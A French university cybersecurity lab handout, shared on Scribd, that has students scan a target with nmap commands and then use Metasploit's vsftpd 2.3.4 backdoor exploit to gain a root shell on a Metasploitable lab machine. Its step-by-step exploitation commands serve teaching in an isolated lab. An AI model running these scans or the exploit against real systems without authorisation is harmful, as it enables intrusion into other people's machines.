0% ont trouvé ce document utile (0 vote)
87 vues2 pages

Scanning Réseau et Accès avec Nmap

Ce document décrit comment utiliser l'outil nmap pour scanner un réseau et identifier des services et versions sur des hôtes cibles, puis comment utiliser Metasploit pour exploiter une vulnérabilité dans le service vsftpd afin de prendre le contrôle d'un système distant.

Transféré par

Salsa
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd
0% ont trouvé ce document utile (0 vote)
87 vues2 pages

Scanning Réseau et Accès avec Nmap

Ce document décrit comment utiliser l'outil nmap pour scanner un réseau et identifier des services et versions sur des hôtes cibles, puis comment utiliser Metasploit pour exploiter une vulnérabilité dans le service vsftpd afin de prendre le contrôle d'un système distant.

Transféré par

Salsa
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd

Université Batna2

Chahid Mostefa Benboulaid


Faculté des sciences Département d’informatique TP Cyber Sécurité 1

TP2: Le Scanning Réseau et le Gain d'accès


I. Le Scanning Réseau
Dans cette première partie du TP nous allons découvrir les services
de base de l'un des outils de scan réseau le plus répondu, on parle
de nmap.

Nmap (Network mapper) est un scanner réseau permettant de


récupérer des informations sur des hôtes ou des services qui tournent sur des hôtes faisant
parti du réseau interne ou externe.

Pour information:

 Il existe d'autres outils de scan tel que: superscan, Angry IP Scanner, etc.
 Il existe une interface graphique de nmap appelée "zenmap", cependant, dans ce TP
nous allons utiliser nmap en ligne de commande.

Attention /!\: Vous n'avez pas le droit de scanner des IPs et/ou domaines qui ne vous
appartiennent pas.

nmap a créé un serveur pour faire des tests sur domaine c'est le domaine: [Link]

1) Pour chacune des commandes suivantes répondez aux questions suivantes:

a) Que fait la commande ?


b) En quoi la commande est-elle utile pour un attaquant ?

Les commandes doivent être lancer avec le shell root.

 nmap -sP <IP de la victime>


 nmap -sP <une autre IP du réseau>
 nmap -sS <IP de la victime>
 nmap -sV <IP de la victime>
 nmap -p 80,443 <IP de la victime>
 nmap -sV -p 80,443 <IP de la victime>
 nmap -sV -p 80,443 <IP de la victime> -A

2) Quels sont les différents états (stat) de ports retournés par nmap ?

Autres commandes:
 nmap -sV -p 80,443 <IP de la victime> > [Link]
 nmap -6 <IPv6 de la victime>
 nmap -sC -p 80 <IP de la victime>

Enseignante: Nesrine KHERNANE


Université Batna2
Chahid Mostefa Benboulaid
Faculté des sciences Département d’informatique TP Cyber Sécurité 1

Vous pouvez scanner plus qu'une seule adresse IP en utilisant l'une des méthodes suivantes:

 [Link]-100
 192.168.12.*
 [Link]/24

II. Le gain d'accès


Dans cette deuxième partie nous allons utiliser Metasploit framework

1) Relancer la commande nmap -sV <IP de la victime>

 Donner le service, la version ainsi que l'état du port 21

2) Lancer l'interface console avec la commande "msfconsole"

3) Lancer la commande "search vsftp" et dites ce que vous remarquez.

4) Lancer la commande "info exploit/unix/ftp/vsftpd_234_backdoor" . Quelle information


peut-on voir après le lancement de cette commande ?

5) Utilisation de l'exploit:

 Lancer la commande "use exploit/unix/ftp/vsftpd_234_backdoor "


 Lancer la commande "show options" et dites pourquoi cette commande est-elle
importante ?
 Lancer la commande "set RHOSTS <IP de la victime>"
 Relancer "show options" et dites ce que vous remarquez.
 Lancer l'exploit avec la commande "exploit"

A cette étape vous avez gagner l'accès à la machine victime et vous êtes sur la machine
de la victime.

 Taper la commande qui vous permet de voir le chemin sur lequel vous êtes sur la
machine de la victime
 Taper la commande "cd root"
 rendez vous sur la machine de la victime (Metasploitable) et taper "ls"
 Revenez à la machine Kali et Taper la commande qui vous permet de créer un fichier
"[Link]"
 rendez vous sur la machine de la victime (Metasploitable) et taper "ls", que
remarquez vous ?

Enseignante: Nesrine KHERNANE

Vous aimerez peut-être aussi